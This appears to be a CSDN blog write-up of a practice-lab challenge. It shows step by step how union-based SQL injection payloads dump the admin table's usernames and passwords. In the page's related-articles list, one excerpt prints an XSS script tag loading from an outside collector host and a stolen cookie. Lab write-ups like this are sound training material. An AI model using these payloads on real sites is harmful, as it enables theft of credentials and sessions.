封神台----尤里的复仇I-第一章:为了女神小芳

最新推荐文章于 2023-06-02 11:37:42 发布
最新推荐文章于 2023-06-02 11:37:42 发布
阅读量3k 收藏 7
点赞数 1
分类专栏: 渗透学习 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_yhy/article/details/96371753
版权

1.找注入点

?id=1 and 1=1 ------ 显示正常
?id=1 and 1=2 ------ 不显示

2.猜列数、报显示位

?id=1 order by 2 ------查询了两列
?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位
在这里插入图片描述

3.查看数据库版本和当前数据库名

?id=132321 union select 1,version() %23
?id=132321 union select 1,database() %23
在这里插入图片描述
在这里插入图片描述

数据库>5.0,可以使用information_schema进行后续操作。

4.得到表名

?id=132321 union select 1,group_concat(table_name) from
information_schema.tables where table_schema=database() %23
在这里插入图片描述
根据题意,是得到管理员密码,之后操作admin表

5.爆字段名

?id=132321 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘admin’ %23
在这里插入图片描述

6.爆表中数据

?id=132321 union select 1,group_concat(username) from admin %23
在这里插入图片描述
?id=132321 union select 1,group_concat(password) from admin %23
在这里插入图片描述

提交flag,结束。

向那风
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2026
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
第一章:为了女神小芳
m0_59205095的博客
05-16 2226
第一章:为了女神小芳 通过sql注入拿到管理员密码!尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了 宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn) 实验工具 sqlmap 实验环境 kali 1.判断是否存在注入点,页面显示如图所示可能存在sql注入点 http://rhiq8003.ia.aqlab.cn/?id=1and%
神台第一章:为了女神小芳
qq_51459600的博客
12-22 503
实验平台:神台-掌控安全在线演练靶场 第一章:为了女神小芳! 传送门:http://rhiq8003.ia.aqlab.cn/ 实验目标:获取admin的密码 点击查看新闻1,跳转到http://rhiq8003.ia.aqlab.cn/?id=1 发现传递的参数名为id   判断有无注入点 http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 未显示出新闻内容,说明存在注入点   判断查询字段数 http://rhiq8003.ia.aqlab.cn/
注入(一)
tomyyyyy
06-28 277
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台——第一:为了女神小芳
分享简单的安全技术
01-17 694
目:获取数据库管理员密码 目传送阵 渗透步骤        第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。        第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基
yuri-italo:我的GitHub个人资料的配置文件
04-03
:waving_hand: 嗨,我是尤里·伊塔洛(Yuri Italo)。 -- :eyes: 我对......感兴趣 - :seedling: 我目前正在学习...- :revolving_hearts: 我正在寻求合作...- :closed_mailbox_with_raised_flag: 如何到达我...
vostok-dao:NEAR简约DAO钱包
03-14
沃斯托克(Vostok)3KA太空舱于1961年4月12日从拜科努尔宇宙飞船发射升空,苏联宇航员尤里·加加林(Yuri Gagarin)登上太空,这使他成为第一个进入外太空的人。会费根据Mozilla Public License v2,所有代码都是...
自动控制技术与人类进步-东南大学自动化学院.ppt
11-22
1954年,George Devol研制出第一台工业机器人样机,而Joseph Engelberger随后创立了Unimation公司,成为机器人产业的先驱。R. E. Kalman在1960年提出的状态空间法、能控性、能观测性和Kalman滤波等概念,为现代控制...
1333199-pognali-22:尤里·莱特
04-06
2.创建一个叉子,然后单击右上角的“ Fork”按钮。 学院的资源库将被复制到您的帐户中。 结果会是这样的:3.将存储库克隆到您的计算机注意:您需要克隆存储库(叉子),而不是Academy存储库。 还要注意,您需要通过...
examen-final-:尤里为老师
04-27
在IT领域,JavaScript是一种至关重要的编程语言,尤其对于前端开发来说,它是构建交互式网站和应用程序的基础。"尤里为老师"的期末考试可能涵盖了JavaScript的各个方面,包括语法基础、DOM操作、事件处理、AJAX、...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台基础关,第一关
weixin_44106116的博客
11-19 1737
1.判断是否存在SQL注入 点击新闻,看到了地址栏变化,产生了id传参 分别输入,and 1=1 和,and 1=2 显示页面不同,所以,存在sql注入 2.查询字段数,好用联合查询 order by 2 有显示,order by 3 无显示,可知此条语句字段数为2 在之后输入 and 1=2 union select 1,2 注销掉前方的查询语句,查看回显点, 新闻内容中显示了数字2 根据...
神台靶场-第一章
Mr_helloword的博客
07-12 2742
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 寻找注入点,判断是什么注入 |?id=1 and 1=1| 显示正常 | |-|–| | ?id=1and 1=2| 页面有变故(存在注入) | |?id=1’ | 页面有回显但是无法判断注入类型| ||| 查看列数及字段数(这里通过二分法可以快速定位列数为2) 联合查询(注意前面id为假才会执行后门的联合查询) |?id=121 union select 1,2 #| 查看回显位置 | |–|--| |?id=1
神台-第一章:为了女神小芳
qq_64409509的博客
06-02 99
神台-第一章:为了女神小芳
神台 - 掌控安全靶场】尤里复仇小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场】尤里复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 1668
神台靶场 第一章:为了女神小芳 (SQL注入)
神台-靶场-第一章:为了女神小芳!(解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1565
我们先来学习sql注入,
SQL注入漏洞_神台第一关
gou1791241251的博客
12-13 749
SQL注入漏洞_神榜第一关 http://59.63.200.79:8003/?id=1 一、观察疑似可注入点 ?id=1 二、尝试输入单引号和双引号 使用hackbar进行测试比较好 以下是正常显示的结果 以下是输入单引号或双引号的结果 输入单引号时发现页面的内容不见了。同样试试双引号 同样也是一样的结果。在输入–+注释后面的SQL代码时还是同样的页面显示。由此可以判定这一关是数字型注入。那么可以测试一下把双引号或单引号去掉试试看 此时发现页面是正常显示的。如第一张图片。 验证了这个是数字型注入。
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xba in position 13: invalid start byte
最新发布
05-20
这个错误通常出现在Python中,它表示Python解释器在尝试使用UTF-8编码解码一个字符串时出现了错误。具体来说,这个错误通常是由于字符串中包含了无效的字节序列而导致的。 解决这个问的方法是尝试使用其他编码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值